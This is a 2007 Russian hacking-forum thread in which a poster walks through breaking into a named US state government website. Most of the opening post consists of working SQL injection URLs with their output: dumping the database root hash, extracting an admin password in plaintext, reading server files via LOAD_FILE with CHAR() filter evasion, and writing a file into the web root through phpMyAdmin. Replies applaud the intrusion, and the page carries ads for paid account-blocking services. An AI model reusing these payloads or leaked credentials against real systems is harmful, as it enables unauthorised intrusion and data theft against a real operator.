Форум АНТИЧАТ - Заливаем шелл на .gov

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Заливаем шелл на .gov

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Заливаем шелл на .gov

14.08.2007, 02:26

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Заливаем шелл на .gov

В принципе банальная скуля, но все таки удалось залить шелл на gov, при фильтрации ковычек...
Подумал, новичкам будет интересно, если что модеры смело переносите в скули

www.dfcm.utah.gov

Сначала как обычно:

Код:

http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*

4.0.18-log
dfcmadmin@dfcm.utah.gov
dfcm

Думал на этом все закончится, при чем кавычки экранируются...
Но

Код:

http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,user,password,5,6,7,8+from+mysql.user+limit+0,1/*

root:2e64a4f076c68549

и есть filepriv

Код:

http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,3,LOAD_FILE(CHAR(47,101,116,99,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),5,6,7,8+from+mysql.user/*

читаем /etc/passwd для проверки, естественно с обходом фильтрации через char().
Заодно перелопатил все стандартные пути к конфигам, нашел вроде httpd.conf - оказался левый, ну думаю совсем плохо путей то нет((

Да еще into outfile не катит кавычки фильтруются и ничего не помагает ни хекс, ни чар(((

Зато нашел таблицу login

Код:

http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,username,password,5,6,7,8+from+login/*

и вытащил
admin:gmjbcbss

Обрадовался, есть админка и пасс подошел
http://www.dfcm.utah.gov/admin/

Но оказалась тупая цмска по управлению проектами и новостями, попытался через аплоады файлов, а там фильтрация и только .pdf вообщем парился долго, забил...
Думаю все, НО тут вспомнил про хеш рута, и решил а почему бы и нет, короче в джоник его и о счастье нашел (пасс выкладывать не буду чтобы сайт сразу не роняли все кому не лень)!

Бегом в phpMyAdmin, ну думаю пора заливать =).

Достаем пути до сайта, спасибо ettee, а то ночной затуп =\

Код:

http://www.dfcm.utah.gov/phpmyadmin/phpinfo.php

Ну и через sql заливаем

Код:

select 'test' from login into outfile '../../../apache/htdocs/df.txt';

Вообщем тестовый файл смотреть здесь http://www.dfcm.utah.gov/df.txt

ЗЫ
За стиль описания прошу сильно не ругаться, писал в почти сонном состоянии =\

Последний раз редактировалось [53x]Shadow; 14.08.2007 в 09:54..

14.08.2007, 21:52

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

спс, как раз на пиво не хватает)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

14.08.2007, 22:00

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

ммм сори но что это за наркоманство?

Цитата:

select 'test' from login into outfile '../../../apache/htdocs/df.txt';

Дальше корня не убежишь.

14.08.2007, 22:28

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Цитата:

Сообщение от [ cash ]

ммм сори но что это за наркоманство?

Дальше корня не убежишь.

Просто не прописал оставшуюся часть, чтобы все подряд не заливали =\

15.08.2007, 11:48

Dimon_Aka_Sexxx

Новичок

Регистрация: 22.01.2007

Сообщений: 18

Провел на форуме:
105006

Репутация: 6

Красиво )

15.08.2007, 18:49

fly

Постоянный

Регистрация: 15.04.2007

Сообщений: 645

Провел на форуме:
967842

Репутация: 251

Отправить сообщение для fly с помощью ICQ

Типично! 5 из 10 gov или edu уязвимы на скули.!!!!!

15.08.2007, 19:23

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Цитата:

Сообщение от fly

Типично! 5 из 10 gov или edu уязвимы на скули.!!!!!

Ну я бы не был так категоричен, это смотря по какому критерию отбирать! А так если через гугл, то имхо 1 из 10 и причем не всегда мона шелл пропихнуть... А в разделе скулей я вообще не видел ни одной доведенной до заливки =\

15.08.2007, 19:36

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

молодец, +

я бы еще 3 способа заливки здесь описал )

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

15.08.2007, 19:56

iv.

Moderator - Level 7

Регистрация: 21.03.2007

Сообщений: 1,200

Провел на форуме:
7134052

Репутация: 1204

Вы под колпаком.

#10

18.08.2007, 22:27

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Цитата:

Сообщение от iv.

Вы под колпаком.

эт ты к чему вообще?!?! =\
А что, прокси кто-то отменял?

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Заливаем шелл в Ipb 2..(и больше не спрашиваем:))	VampiRUS	Форумы	7	02.02.2009 20:44
Продам шелл в зоне .gov. PR=4	Delphi'n	Доступы, shells, ftp - Покупка, продажа	4	15.04.2007 15:34
чо такое шелл?	Fujosej	PHP, PERL, MySQL, JavaScript	3	23.05.2005 10:25
Можно ли получить php шелл из админки phpbb 2.0.1x?	[TSH]Corpse	Форумы	6	07.03.2005 04:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход